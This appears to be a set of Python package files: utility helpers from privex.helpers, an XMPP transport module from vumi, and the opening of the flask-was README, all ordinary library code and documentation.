>>> almost('5', '5.14', '4.85', '5.08', tolerance=Decimal('0.2'))
True
>>> almost('5', '5.3', '4.85', '5.08', tolerance=Decimal('0.2'))
False
Using ``fail`` or ``test``::
>>> # By passing ``fail=True``, a descriptive AssertionError is raised when the tolerance check fails.
>>> almost('5', '5.01', fail=True)
True
>>> almost('5', '5.02', fail=True)
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "privex/helpers/common.py", line 1044, in almost
raise AssertionError(
AssertionError: Number at position 0 (val: 5.02) failed tolerance (0.01) check against 5
>>> # By passing ``test=True``, a standard ``assert`` will be used to compare the numbers.
>>> almost('5', '5.01', test=True)
True
>>> almost('5', '5.02', test=True)
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "privex/helpers/common.py", line 1041, in almost
assert (x - tolerance) <= compare <= (x + tolerance)
AssertionError
:param Decimal|int|float|str compare: The base number which all ``numbers`` will be compared against.
:param Decimal|int|float|str numbers: One or more numbers to compare against ``compare``
:param Decimal|int|float|str tolerance: (kwarg only) Amount that each ``numbers`` can be greater/smaller than ``compare`` before
returning ``False``.
:keyword bool fail: (default: ``False``) If true, will raise :class:`.AssertionError` on failed tolerance check, instead of
returning ``False``. (mutually exclusive with ``assert``)
:keyword bool test: (default: ``False``) If true, will use ``assert`` instead of testing with ``if``. Useful in unit tests.
(mutually exclusive with ``raise``)
:raises AttributeError: When less than 1 number is present in ``numbers``
:raises AssertionError: When kwarg ``raise`` is ``True`` and one or more numbers failed the tolerance check.
:return bool is_almost: ``True`` if all ``numbers`` are within ``tolerance`` of ``compare``, ``False`` if one or more ``numbers``
is outside of the tolerance.
"""
if len(numbers) < 1:
raise AttributeError(
f'privex.helpers.common.almost expects at least ONE number to compare.'
)
numbers = [Decimal(n) for n in numbers]
compare, tolerance = Decimal(compare), Decimal(tolerance)
should_raise, should_assert = kwargs.get('fail', False), kwargs.get('test', False)
for i, x in enumerate(numbers):
if should_assert:
assert (x - tolerance) <= compare <= (x + tolerance)
elif not ((x - tolerance) <= compare <= (x + tolerance)):
if should_raise:
raise AssertionError(
f"Number at position {i} (val: {x}) failed tolerance ({tolerance}) check against {compare}"
)
return False
return True
IS_XARGS = re.compile('^\*([a-zA-Z0-9_])+$')
"""Pre-compiled regex for matching catch-all positional argument parameter names like ``*args``"""
IS_XKWARGS = re.compile('^\*\*([a-zA-Z0-9_])+$')
"""Pre-compiled regex for matching catch-all keyword argument parameter names like ``**args``"""
T_PARAM = inspect.Parameter
"""Type alias for :class:`inspect.Parameter`"""
T_PARAM_LIST = Union[Dict[str, T_PARAM], Mapping[str, T_PARAM], List[T_PARAM], Iterable[T_PARAM]]
"""
Type alias for dict's containing strings mapped to :class:`inspect.Parameter`'s, lists of just
:class:`inspect.Parameter`'s, and any iterable of :class:`inspect.Parameter`
"""
# noinspection PyProtectedMember,PyUnresolvedReferences
INS_EMPTY = inspect._empty
"""
Type alias for :class:`inspect.empty`
"""
def _filter_params(params: T_PARAM_LIST, ignore_xargs=False, ignore_xkwargs=False, **kwargs) -> Dict[str, T_PARAM]:
"""
Filter an iterable containing :class:`inspect.Parameter`'s, returning a :class:`.DictObject` containing
parameter names mapped to their :class:`inspect.Parameter` object.
**Examples**
Function ``some_func`` is used as an example.
>>> import inspect
>>> def some_func(x, y, z=123, *args, **kwargs):
... pass
>>> params = inspect.signature(some_func).parameters
With just parameters, no filtering is done. Only scanning the parameters and returning them as a dict::
>>> _filter_params(params)
{'x': <Parameter "x">, 'y': <Parameter "y">, 'z': <Parameter "z=123">,
'*args': <Parameter "*args">, '**kwargs': <Parameter "**kwargs">}
With the arguments ``ignore_xargs=True`` and ``ignore_xkwargs=True``, this strips away any catch-all parameters
e.g. ``*args`` / ``**kwargs``. Example::
>>> _filter_params(params, ignore_xargs=True, ignore_xkwargs=True)
{'x': <Parameter "x">, 'y': <Parameter "y">, 'z': <Parameter "z=123">}
With the arguments ``ignore_defaults=True`` and ``ignore_positional=True``, this strips away all normal positional
and keyword parameters - leaving only catch-all parameters for positional/keyword arguments. Example::
>>> _filter_params(params, ignore_defaults=True, ignore_positional=True)
{'*args': <Parameter "*args">, '**kwargs': <Parameter "**kwargs">}
:param params: An iterable of :class:`inspect.Parameter`'s, e.g. from ``inspect.signature(func).parameters``
:param bool ignore_xargs: Filter out any catch-all positional arguments (e.g. ``*args``)
:param bool ignore_xkwargs: Filter out any catch-all keyword arguments (e.g. ``**kwargs``)
:key bool ignore_defaults: Filter out any parameter which has a default value (e.g. args usable as kwargs)
:key bool ignore_positional: Filter out any parameter which doesn't have a default value (mandatory args)
:return DictObject filtered: A dictionary of filtered params, mapping param names to Parameter objects.
"""
ignore_defaults = kwargs.pop('ignore_defaults', False)
ignore_positional = kwargs.pop('ignore_positional', False)
_params = params
if isinstance(params, (dict, OrderedDict)) or hasattr(params, 'values'):
_params = params.values()
_is_xargs = lambda param: IS_XARGS.search(str(param)) is not None
_is_xkwargs = lambda param: IS_XKWARGS.search(str(param)) is not None
_is_x_arg = lambda param: _is_xargs(param) or _is_xkwargs(param)
_def_empty = lambda param: empty(param.default) or param.default is INS_EMPTY
filtered = DictObject()
for p in _params: # type: inspect.Parameter
if ignore_xargs and _is_xargs(p): continue
if ignore_xkwargs and _is_xkwargs(p): continue
# x-args (*args / **kwargs) cannot count as defaults / positionals and shouldn't be counted in this IGNORE.
if ignore_defaults and not _def_empty(p) and not _is_x_arg(p): continue
if ignore_positional and _def_empty(p) and not _is_x_arg(p): continue
param_name = str(p) if '=' not in str(p) else p.name
filtered[param_name] = p
return filtered
T_PARAM_DICT = Union[
Dict[str, T_PARAM],
DictObject,
Dict[type, Dict[str, T_PARAM]]
]
"""
Type alias for dict's mapping parameter names to :class:`inspect.Parameter`'s, :class:`.DictObject`'s,
and dict's mapping classes to dict's mapping parameter names to :class:`inspect.Parameter`'s.
"""
def get_function_params(obj: Union[type, callable], check_parents=False, **kwargs) -> T_PARAM_DICT:
"""
Extracts a function/method's signature (or class constructor signature if a class is passed), and returns
it as a dictionary.
Primarily used by :func:`.construct_dict` - but may be useful for other purposes.
If you've passed a class, you can set ``check_parents`` to ``True`` to obtain the signatures of the passed
class's constructor AND all of it's parent classes, returned as a dictionary mapping classes to dictionaries
of parameters.
If you've set ``check_parents`` to ``True``, but you want the parameters to be a flat dictionary (just like when
passing a function or class without check_parents), you can also pass ``merge=True``, which merges each class's
constructor parameters into a dictionary mapping names to :class:`inspect.Parameter` objects.
If any parameters conflict, children's constructor parameters always take precedence over their parent's version,
much in the same way that Python's inheritance works.
**Basic (with functions)**::
>>> def some_func(x, y, z=123, *args, **kwargs):
... pass
Get all normal parameters (positional and kwargs - excluding catch-all ``*args`` / ``**kwargs`` parameter types)::
>>> params = get_function_params(some_func)
>>> params
{'x': <Parameter "x">, 'y': <Parameter "y">, 'z': <Parameter "z=123">}
Get raw parameter name and value (as written in signature) / access default values::
>>> str(params.z.name) # You can also access it via params['z']
'z=123'
>>> params.z.default # You can also access it via params['z']
123
Get only **required** parameters::
>>> get_function_params(some_func, ignore_defaults=True)
{'x': <Parameter "x">, 'y': <Parameter "y">}
Get only parameters with defaults::
>>> get_function_params(some_func, ignore_positional=True)
{'z': <Parameter "z=123">}
**Example Usage (with classes and sub-classes)**::
>>> class BaseClass:
... def __init__(self, a, b, c=1234, **kwargs):
... pass
>>> class Example(BaseClass):
... def __init__(self, d, e='hello', f=None, a='overridden', **kwargs):
... super().__init__(a=a, d=d, e=e, f=f, **kwargs)
If we pass the class ``Example`` on it's own, we get a dictionary of just it's own parameters::
>>> get_function_params(Example)
{'d': <Parameter "d">, 'e': <Parameter "e='hello'">, 'f': <Parameter "f=None">}
However, if we set ``check_parents=True``, we now get a dictionary containing ``Example``'s constructor parameters,
AND ``BaseClass``'s (it's parent class) constructor parameters, organised by class::
>>> get_function_params(Example, True)
{
<class '__main__.Example'>: {
'd': <Parameter "d">, 'e': <Parameter "e='hello'">, 'f': <Parameter "f=None">,
'a': <Parameter "a='overridden'">
},
<class '__main__.BaseClass'>: {'a': <Parameter "a">, 'b': <Parameter "b">, 'c': <Parameter "c=1234">}
}
We can also add the optional kwarg ``merge=True``, which merges the parameters of the originally passed class,
and it's parents.
This is done in reverse order, so that children's conflicting constructor parameters take priority over their
parents, as can be seen below with ``a`` which is shown as ``a='overridden'`` - the overridden parameter
of the class ``Example`` with a default value, instead of the parent's ``a`` which makes ``a`` mandatory::
>>> get_function_params(Example, True, merge=True)
{
'a': <Parameter "a='overridden'">, 'b': <Parameter "b">, 'c': <Parameter "c=1234">,
'd': <Parameter "d">, 'e': <Parameter "e='hello'">, 'f': <Parameter "f=None">
}
:param type|callable obj: A class (not an instance) or callable (function / lambda) to extract and filter the
parameter's from. If a class is passed, the parameters of the constructor will be
returned (``__init__``), excluding the initial ``self`` parameter.
:param bool check_parents: (Default: ``False``) If ``obj`` is a class and this is True, will recursively grab
the constructor parameters for all parent classes, and return the parameters as a dictionary of
``{<class X>: {'a': <Parameter 'a'>}, <class Y>: {'b': <Parameter 'b'>}``, unless ``merge`` is also set
to ``True``.
:key bool ignore_xargs: (Default: ``True``) Filter out any catch-all positional arguments (e.g. ``*args``)
:key bool ignore_xkwargs: (Default: ``True``) Filter out any catch-all keyword arguments (e.g. ``**kwargs``)
:key bool ignore_defaults: (Default: ``False``) Filter out any parameter which has a default
value (e.g. args usable as kwargs)
:key bool ignore_positional: (Default: ``False``) Filter out any parameter which doesn't have a default
value (mandatory args)
:key bool merge: (Default: ``False``) If this is True, when ``check_parents`` is enabled, all parameters will
be flatted into a singular dictionary, e.g. ``{'a': <Parameter 'a'>, 'b': <Parameter "b">}``
:return:
"""
merge = kwargs.pop('merge', False)
filter_opts = dict(**kwargs)
filter_opts['ignore_xargs'] = filter_opts.get('ignore_xargs', True)
filter_opts['ignore_xkwargs'] = filter_opts.get('ignore_xkwargs', True)
_cls_keys = inspect.signature(obj).parameters
cls_keys = _filter_params(inspect.signature(obj).parameters, **filter_opts)
if check_parents and hasattr(obj, '__base__') and inspect.isclass(obj):
ret = OrderedDictObject({obj: cls_keys})
last_parent = obj.__base__
while last_parent not in [None, type, object]:
try:
ret[last_parent] = _filter_params(
inspect.signature(last_parent).parameters, **filter_opts
)
if not hasattr(last_parent, '__base__'):
last_parent = None
continue
last_parent = last_parent.__base__
except (Exception, BaseException) as e:
log.warning("Finishing check_parents loop due to exception: %s - %s", type(e), str(e))
last_parent = None
continue
if merge:
merged = OrderedDictObject()
for cls in reversed(ret):
for k, p in ret[cls].items():
merged[k] = p
return merged
return ret
return OrderedDictObject(cls_keys)
def construct_dict(cls: Union[Type[T], C], kwargs: dict, args: Iterable = None, check_parents=True) -> Union[T, Any]:
"""
Removes keys from the passed dict ``data`` which don't exist on ``cls`` (thus would get rejected as kwargs)
using :func:`.get_function_params`. Then create and return an instance of ``cls``, passing the filtered
``kwargs`` dictionary as keyword args.
Ensures that any keys in your dictionary which don't exist on ``cls`` are automatically filtered out, instead
of causing an error due to unexpected keyword arguments.
**Example - User class which only takes specific arguments**
First let's define a class which only takes three arguments in it's constructor - username, first_name, last_name.
>>> class User:
... def __init__(self, username, first_name=None, last_name=None):
... self.username = username
... self.first_name, self.last_name = first_name, last_name
...
Now we'll create a dictionary which has those three arguments, but also the excess ``address`` and ``phone``.
>>> data = dict(username='johndoe123', first_name='John', last_name='Doe',
... address='123 Example St', phone='+1-123-000-1234')
If we tried to directly pass data as keyword args, we'd get an error::
>>> john = User(**data)
TypeError: __init__() got an unexpected keyword argument 'address'
But by using :func:`.construct_dict`, we're able to construct a ``User``, as this helper function detects that
the excess ``address`` and ``phone`` are not valid parameters for ``User``'s constructor.
>>> from privex.helpers import construct_dict
>>> john = construct_dict(User, data)
>>> print(john.username, john.first_name, john.last_name)
johndoe123 John Doe
**Example - A function/method which only takes specific arguments**
Not only can :func:`.construct_dict` be used for classes, but it can also be used for any function/method.
Here's an example using a simple "factory function" which creates user objects::
>>> def create_user(username, first_name=None, last_name=None):
... return User(username, first_name, last_name)
>>>
>>> data = dict(
... username='johndoe123', first_name='John', last_name='Doe',
... address='123 Example St', phone='+1-123-000-1234'
... )
>>> # We can't just pass data as kwargs due to the extra keys.
>>> create_user(**data)
TypeError: create_user() got an unexpected keyword argument 'address'
>>> # But we can call the function using construct_dict, which filters out the excess dict keys :)
>>> john = construct_dict(create_user, data)
>>> print(john.username, john.first_name, john.last_name)
johndoe123 John Doe
:param Type[T]|callable cls: A class (not an instance) or callable (function / lambda) to extract and filter the
parameter's from, then call using filtered ``kwargs`` and ``args``.
:param dict kwargs: A dictionary containing keyword arguments to filter and use to call / construct ``cls``.
:param list|set args: A list of positional arguments (NOT FILTERED!) to pass when calling/constructing ``cls``.
:param bool check_parents: (Default: ``True``) If ``obj`` is a class and this is True, will recursively grab
the constructor parameters for all parent classes of ``cls`` and merge them into the
returned dict.
:return Any func_result: If ``cls`` was a function/method, the return result will be the returned data/object
from the function passed.
:return T cls_instance: If ``cls`` was a class, then the return result will be an instance of the class.
"""
args = empty_if(args, [])
if hasattr(cls, '__attrs_attrs__'):
# If the passed object has the attribute __attrs_attrs__, then this means that it's an ``attr.s`` class, so
# we should just extract the attributes from __attrs_attrs__.
cls_keys = [atr.name for atr in cls.__attrs_attrs__]
else:
# Otherwise, extract the function / class's expected parameter names using our helper get_function_params().
cls_keys = get_function_params(cls, check_parents=check_parents, merge=True)
cls_keys = cls_keys.keys()
clean_data = {x: y for x, y in kwargs.items() if x in cls_keys}
return cls(*args, **clean_data)
class LayeredContext:
"""
A wrapper class for context manager classes / functions which allows you to control how many ``with`` layers that a context manager
can have - and allow for the previous layer's context manager ``__enter__`` / ``yield`` result to be passed down
when :attr:`.max_layers` is hit.
(context managers are classes/functions with the methods ``__enter__`` / ``__exit__`` / ``__aenter__`` / ``__aexit__`` etc.)
Works with context manager classes, asyncio context manager classes, and :func:`contextlib.contextmanager` functions.
By default, :class:`.LayeredContext` sets :attr:`.max_layers` to ``1``, meaning after 1 layer of ``with`` or ``async with``
statements, all additional layers will simply get given the same context result as the 1st layer, plus both ``__enter__``
and ``__exit__`` will only be called once (at the start and end of the first layer).
**Using with class-based context managers**::
>>> class Hello:
... def __enter__(self):
... print('entering Hello')
... return self
... def __exit__(self, exc_type, exc_val, exc_tb):
... print('exiting Hello')
>>> ctx_a = LayeredContext(Hello())
>>> with ctx_a as a:
... print('class manager layer 1')
... with ctx_a as b:
... print('class manager layer 2')
... print('back to class layer 1')
entering Hello
class manager layer 1
class manager layer 2
back to class layer 1
exiting Hello
We can see that ``entering Hello`` and ``exiting Hello`` were only outputted at the end of the first context block ``with ctx_a as a``,
showing that ``Hello`` was only entered/exited as a context manager for the first ``with`` block.
**Using with function-based :func:`contextlib.contextmanager` context managers**::
>>> from contextlib import contextmanager
>>> @contextmanager
>>> def lorem():
... print('entering lorem contextmanager')
... yield 'hello world'
... print('exiting lorem contextmanager')
>>> ctx_b = LayeredContext(lorem())
>>> with ctx_b as c:
... print('function manager layer 1 - context is:', c)
... with ctx_b as d:
... print('function manager layer 2 - context is:', d)
... print('back to function layer 1')
entering lorem contextmanager
function manager layer 1 - context is: hello world
function manager layer 2 - context is: hello world
back to function layer 1
exiting lorem contextmanager
We can see the default :attr:`.max_layers` of ``1`` was respected, as the 2nd layer ``with ctx_b as d`` only
printed ``function manager layer 2`` (thus ``lorem``'s enter/exit methods were not called), and it shows the
context is still ``hello world`` (the context yielded by ``lorem`` in layer 1).
**Example usage**
First we need an example class which can be used as a context manager, so we create ``Example`` with a very simple
``__enter__`` and ``__exit__`` method, which simply adds and subtracts from ``self.ctx_layer`` respectively::
>>> class Example:
... def __init__(self):
... self.ctx_layer = 0
... def __enter__(self):
... self.ctx_layer += 1
... return self
... def __exit__(self, exc_type, exc_val, exc_tb):
... if self.ctx_layer <= 0: raise ValueError('ctx_layer <= 0 !!!')
... self.ctx_layer -= 1
... return None
If we then create an instance of ``Example``, and use it as a context manager in a 2 layer nested ``with exp``, we can see
``ctx_layer`` gets increased each time we use it as a context manager, and decreases after the context manager block::
>>> exp = Example()
>>> with exp as x:
... print(x.ctx_layer) # prints: 1
... with exp as y:
... print(y.ctx_layer) # prints: 2
... print(x.ctx_layer) # prints: 1
>>> exp.ctx_layer
0
Now, lets wrap it with :class:`.LayeredContext`, and set the maximum amount of layers to ``1``. If we start using ``ctx`` as a
context manager, it works as if we used the example instance ``exp`` as a context manager. But, unlike the real instance, ``__enter__``
is only really called for the first ``with`` block, and ``__exit__`` is only really called once we finish the first
layer ``with ctx as x`` ::
>>> ctx = LayeredContext(exp, max_layers=1)
>>> with ctx as x:
... print(x.ctx_layer) # prints: 1
... with ctx as y:
... print(y.ctx_layer) # prints: 1
... print(ctx.virtual_layer) # prints: 2
... print(x.ctx_layer) # prints: 1
... print(ctx.virtual_layer) # prints: 1
>>> exp.ctx_layer
0
>>> print(ctx.layer, ctx.virtual_layer)
0 0
"""
wrapped_class: K
layer_contexts: List[Any]
current_context: Optional[Union[K, Any]]
layer: int
virtual_layer: int
max_layers: Optional[int]
fail: bool
def __init__(self, wrapped_class: K, max_layers: Optional[int] = 1, fail: bool = False):
"""
Construct a :class:`.LayeredContext` instance, wrapping the context manager class instance or func:`contextlib.contextmanager`
manager function ``wrapped_class``.
:param K|object wrapped_class: A context manager class or :func:`contextlib.contextmanager` manager function to wrap
:param int max_layers: Maximum layers of ``(async) with`` blocks before silently consuming further attempts to enter/exit
the context manager for :attr:`.wrapped_class`
:param bool fail: (default: ``False``) When ``True``, will raise :class:`.NestedContextException` when an :meth:`.enter` call is
going to cause more than ``max_layers`` context manager layers to be active.
"""
self.fail = fail
self.max_layers = max_layers
self.wrapped_class = wrapped_class
self.layer_contexts = []
self.current_context = None
self.layer = 0
self.virtual_layer = 0
@property
def class_name(self):
if hasattr(self.wrapped_class, '__name__'):
return self.wrapped_class.__name__
return self.wrapped_class.__class__.__name__
def enter(self) -> Union[K, Any]:
self._virt_enter()
if not self.max_layers or self.layer < self.max_layers:
return self._enter(self.wrapped_class.__enter__())
if self.fail:
raise NestedContextException(f"Too many context manager layers for {self.class_name} ({self.__class__.__name__})")
return self.current_context
def exit(self, exc_type=None, exc_val=None, exc_tb=None) -> Any:
if self._virt_exit():
return self._exit(self.wrapped_class.__exit__(exc_type, exc_val, exc_tb))
return None
async def aenter(self) -> Union[K, Any]:
self._virt_enter()
if not self.max_layers or self.layer < self.max_layers:
return self._enter(await self.wrapped_class.__aenter__())
if self.fail:
raise NestedContextException(f"Too many context manager layers for {self.class_name} ({self.__class__.__name__})")
return self.current_context
async def aexit(self, exc_type=None, exc_val=None, exc_tb=None) -> Any:
if self._virt_exit():
return self._exit(await self.wrapped_class.__aexit__(exc_type, exc_val, exc_tb))
return None
def _enter(self, context: Optional[Union[K, Any]]):
self.layer += 1
log.debug(
"Entering context layer %d (virt: %d) of class %s (max: %d)", self.layer, self.virtual_layer, self.class_name, self.max_layers
)
self.current_context = context
self.layer_contexts.append(self.current_context)
return self.current_context
def _exit(self, result):
log.debug("Exiting context layer %d of class %s (max layers: %d)", self.layer, self.class_name, self.max_layers)
self.layer -= 1
self.layer_contexts.pop(self.layer)
self.current_context = None if self.layer < 1 else self.layer_contexts[self.layer - 1]
return result
def _virt_enter(self):
self.virtual_layer += 1
log.debug("ENTER virtual layer %d of class %s (max layers: %d)", self.virtual_layer, self.wrapped_class, self.max_layers)
def _virt_exit(self):
if self.virtual_layer < 1:
log.debug("Not calling real _exit as virtual_layer (%d) is 0 or less", self.virtual_layer)
return False
log.debug("EXIT virtual layer %d of class %s (max layers: %d)", self.virtual_layer, self.wrapped_class, self.max_layers)
self.virtual_layer -= 1
if self.virtual_layer >= self.layer:
log.debug("Not calling real _exit as virtual_layer (%d) >= layer (%d)", self.virtual_layer, self.layer)
return False
return True
def __enter__(self) -> Union[K, Any]:
return self.enter()
def __exit__(self, exc_type, exc_val, exc_tb) -> Any:
return self.exit(exc_type, exc_val, exc_tb)
async def __aenter__(self) -> Union[K, Any]:
return await self.aenter()
async def __aexit__(self, exc_type, exc_val, exc_tb) -> Any:
return await self.aexit(exc_type, exc_val, exc_tb)
def strip_null(value: Union[str, bytes], conv: Callable[[str], Union[str, bytes, T]] = stringify, nullc="\00") -> Union[str, bytes, T]:
"""
Small convenience function which :func:`.stringify`'s ``value`` then strips it of whitespace and null bytes, with
two passes for good measure.
:param str|bytes value: The value to clean whitespace/null bytes out of
:param callable conv: (Default :func:`.stringify`) Optionally, you can override the casting function used after
the stripping is completed
:param str nullc: (Default: ``\00``) Null characters to remove
:return str|bytes|T cleaned: The cleaned up ``value``
"""
value = stringify(value).strip().strip(nullc).strip().strip(nullc)
return conv(value)
def auto_list(obj: V, conv: Union[Type[T], Callable[[V], T]] = list, force_wrap=False, force_iter=False, **kw) -> T:
"""
Used for painless conversion of various data types into list-like objects (:class:`.list` / :class:`.tuple` / :class:`.set` etc.)
Ensure object ``obj`` is a list-like object of type ``conv``, if it isn't, then attempt to convert it into
an instance of ``conv`` via either **list wrapping**, or **list iterating**, depending on the type that ``obj`` is detected to be.
Examples::
>>> auto_list('hello world')
['hello world']
>>> auto_list('lorem ipsum', conv=set)
{'lorem ipsum'}
>>> auto_list('hello world', force_iter=True)
['h', 'e', 'l', 'l', 'o', ' ', 'w', 'o', 'r', 'l', 'd']
>>> auto_list(('this', 'is', 'a', 'test',))
['this', 'is', 'a', 'test']
>>> auto_list(('this', 'is', 'a', 'test',), force_wrap=True)
[('this', 'is', 'a', 'test')]
**List Wrapping**
The **list wrapping** conversion method is when we wrap an object with list brackets, i.e. ``[obj]``. which makes
the ``obj`` a single item inside of a new list.
This is important for simple single-value data types such as :class:`.str`, :class:`.bytes`, integers, floats etc. - since
using ``list()`` might simply iterate over their contents, e.g. turnining ``"hello"`` into ``['h', 'e', 'l', 'l', 'o']``,
which is rarely what you intend when you want to convert an object into a list.
This method is used by default for the types::
str, bytes, int, float, Decimal, bool, dict
To force conversion via **List Wrapping**, set the argument ``force_wrap=True``
**List Iteration / Iterating**
The **list iteration** method is when we call ``list(obj)`` to convert ``obj`` 's **contents** into a list,
rather than making ``obj`` an item inside of the list.
This is important for other list-like data types such as :class:`.list` / :class:`.set` / :class:`.tuple` etc.,
since with the **List Wrapping** method, it would result in for example, a set ``{'hello', 'world'}`` simply
being wrapped by a list ``[{'hello', 'world'}]``, instead of converting it into a list.
To force conversion via **List Iteration**, set the argument ``force_iter=True``
This method is used bt default for the types::
list, set, tuple, range
any object which didn't match the list wrapping type checks and has the method: __iter__
:param V|any obj: An object of practically any type, to convert into an instance type of ``conv``
:param T|type|callable conv: A :class:`.type` which is also callable with ``obj`` as the first positional argument, to convert
``obj`` into a ``conv`` instance.
:param bool force_wrap: When set to ``True``, ``obj`` will always be converted into ``conv`` using the list
wrapping method ``conv([obj])``, regardless of whether it's a type that should or shouldn't be wrapped.
:param bool force_iter: When set to ``True``, ``obj`` will always be converted into ``conv`` using the list iterator
method, i.e. ``conv(list(obj))``, regardless of whether it's a type that should or shouldn't be iterated.
:keyword bool zero: Passthru argument to :func:`.empty` (treat the number ``0`` as empty)
:keyword bool itr: Passthru argument to :func:`.empty` (treat zero-length iterables as empty)
:return T|list|set|tuple data: The object ``obj`` after converting it into a ``conv`` instance
"""
obj = empty_if(obj, [], zero=kw.get('zero', True), itr=kw.get('itr', True))
# If ``obj`` is already the correct type, then return it.
if obj is not None and isinstance(obj, conv): return obj
# For basic object types which simply contain a singular piece of data, such as strings, bytes, int, float etc.
# it's important that we wrap them in [] to make them into just one item inside of a list, before converting the list
# into whatever it's final form is.
if not force_iter and (force_wrap or isinstance(obj, (str, bytes, int, float, Decimal, bool, dict))):
return conv([obj])
# If an object is a list/set/tuple/similar iterable object, then it's probably better if we use ``list()`` + ``conv()`` to convert
# the CONTENTS of the object into ``conv``, rather than just wrapping the object itself as a single item
if force_iter or isinstance(obj, (list, set, tuple, range)) or hasattr(obj, '__iter__'): return conv(list(obj))
return conv(obj)
|
PypiClean
|
/vumi-seidu626-0.6.17.tar.gz/vumi-seidu626-0.6.17/vumi/transports/xmpp/xmpp.py
|
from twisted.words.protocols.jabber.jid import JID
from twisted.words.xish import domish
from twisted.words.xish.domish import Element as DomishElement
from twisted.internet.task import LoopingCall
from twisted.internet.defer import inlineCallbacks
from wokkel.client import XMPPClient
from wokkel.ping import PingClientProtocol
from wokkel.xmppim import (RosterClientProtocol, MessageProtocol,
PresenceClientProtocol)
from vumi.transports.base import Transport
class TransportRosterClientProtocol(RosterClientProtocol):
def connectionInitialized(self):
# get the roster as soon as the connection's been initialized, this
# allows us to see who's online but more importantly, allows us to see
# who's added us to their roster. This allows us to auto subscribe to
# anyone, automatically adding them to our roster, skips the "user ...
# wants to add you to their roster, allow? yes/no" hoopla.
self.getRoster()
class TransportPresenceClientProtocol(PresenceClientProtocol):
"""
A custom presence protocol to automatically accept any subscription
attempt.
"""
def __init__(self, initialized_callback, *args, **kwargs):
super(TransportPresenceClientProtocol, self).__init__(*args, **kwargs)
self.initialized_callback = initialized_callback
def connectionInitialized(self):
super(TransportPresenceClientProtocol, self).connectionInitialized()
self.initialized_callback()
def subscribeReceived(self, entity):
self.subscribe(entity)
self.subscribed(entity)
def unsubscribeReceived(self, entity):
self.unsubscribe(entity)
self.unsubscribed(entity)
class XMPPTransportProtocol(MessageProtocol, object):
def __init__(self, jid, message_callback, connection_callback,
connection_lost_callback=None,):
super(MessageProtocol, self).__init__()
self.jid = jid
self.message_callback = message_callback
self.connection_callback = connection_callback
self.connection_lost_callback = connection_lost_callback
def reply(self, jid, content):
message = domish.Element((None, "message"))
# intentionally leaving from blank, leaving for XMPP server
# to figure out
message['to'] = jid
message['type'] = 'chat'
message.addUniqueId()
message.addElement((None, 'body'), content=content)
self.xmlstream.send(message)
def onMessage(self, message):
"""Messages sent to the bot will arrive here. Command handling routing
is done in this function."""
if not isinstance(message.body, DomishElement):
return None
text = unicode(message.body).encode('utf-8').strip()
from_addr, _, _ = message['from'].partition('/')
self.message_callback(
to_addr=self.jid.userhost(),
from_addr=from_addr,
content=text,
transport_type='xmpp',
transport_metadata={
'xmpp_id': message.getAttribute('id'),
})
def connectionMade(self):
self.connection_callback()
return super(XMPPTransportProtocol, self).connectionMade()
def connectionLost(self, reason):
if self.connection_lost_callback is not None:
self.connection_lost_callback(reason)
super(XMPPTransportProtocol, self).connectionLost(reason)
class XMPPTransport(Transport):
"""XMPP transport.
Configuration parameters:
:type host: str
:param host:
The host of the XMPP server to connect to.
:type port: int
:param port:
The port on the XMPP host to connect to.
:type debug: bool
:param debug:
Whether or not to show all the XMPP traffic. Defaults to False.
:type username: str
:param username:
The XMPP account username
:type password: str
:param password:
The XMPP account password
:type status: str
:param status:
The XMPP status 'away', 'xa', 'chat' or 'dnd'
:type status_message: str
:param status_message:
The natural language status message for this XMPP transport.
:type presence_interval: int
:param presence_interval:
How often (in seconds) to send a presence update to the roster.
:type ping_interval: int
:param ping_interval:
How often (in seconds) to send a keep-alive ping to the XMPP server
to keep the connection alive. Defaults to 60 seconds.
"""
start_message_consumer = False
_xmpp_protocol = XMPPTransportProtocol
_xmpp_client = XMPPClient
def __init__(self, options, config=None):
super(XMPPTransport, self).__init__(options, config=config)
self.ping_call = LoopingCall(self.send_ping)
self.presence_call = LoopingCall(self.send_presence)
def validate_config(self):
self.host = self.config['host']
self.port = int(self.config['port'])
self.debug = self.config.get('debug', False)
self.username = self.config['username']
self.password = self.config['password']
self.status = self.config['status']
self.status_message = self.config.get('status_message', '')
self.ping_interval = self.config.get('ping_interval', 60)
self.presence_interval = self.config.get('presence_interval', 60)
def setup_transport(self):
self.log.msg("Starting XMPPTransport: %s" % self.transport_name)
self.jid = JID(self.username)
self.xmpp_client = self._xmpp_client(
self.jid, self.password, self.host, self.port)
self.xmpp_client.logTraffic = self.debug
self.xmpp_client.setServiceParent(self)
self.presence = TransportPresenceClientProtocol(self.announce_presence)
self.presence.setHandlerParent(self.xmpp_client)
self.pinger = PingClientProtocol()
self.pinger.setHandlerParent(self.xmpp_client)
self.ping_call.start(self.ping_interval, now=False)
roster = TransportRosterClientProtocol()
roster.setHandlerParent(self.xmpp_client)
self.xmpp_protocol = self._xmpp_protocol(
self.jid, self.publish_message, self.unpause_connectors,
connection_lost_callback=self.connection_lost)
self.xmpp_protocol.setHandlerParent(self.xmpp_client)
self.log.msg("XMPPTransport %s started." % self.transport_name)
def connection_lost(self, reason):
self.log.msg("XMPP Connection lost. %s" % reason)
def announce_presence(self):
if not self.presence_call.running:
self.presence_call.start(self.presence_interval)
@inlineCallbacks
def send_ping(self):
if self.xmpp_client.xmlstream:
yield self.pinger.ping(self.jid)
def send_presence(self):
if self.xmpp_client.xmlstream:
self.presence.available(statuses={
None: self.status})
def teardown_transport(self):
self.log.msg("XMPPTransport %s stopped." % self.transport_name)
ping_call = getattr(self, 'ping_call', None)
if ping_call and ping_call.running:
ping_call.stop()
presence_call = getattr(self, 'presence_call', None)
if presence_call and presence_call.running:
presence_call.stop()
def handle_outbound_message(self, message):
recipient = message['to_addr']
text = message['content']
jid = JID(recipient).userhost()
if not self.xmpp_protocol.xmlstream:
self.log.err("Outbound undeliverable, XMPP not initialized yet.")
return False
else:
self.xmpp_protocol.reply(jid, text)
return self.publish_ack(
user_message_id=message['message_id'],
sent_message_id=message['message_id'])
|
PypiClean
|
/flask_was-0.1.0.tar.gz/flask_was-0.1.0/README.md
|

🍾 **Flask extension for JSON API**
> This project is created and maintained by ISCLUB studio. Use the MIT license on GITHUB and PYPI
## Introduction
**Flask-was** can better realize the separation of front and back ends. Quickly create data verification and check before the view function runs, generate data and return. You can also create user verification functions to data verification. Fast and elegant
## Install
Use pip to install or update:
``` bash
$ pip install -U flask-was
```
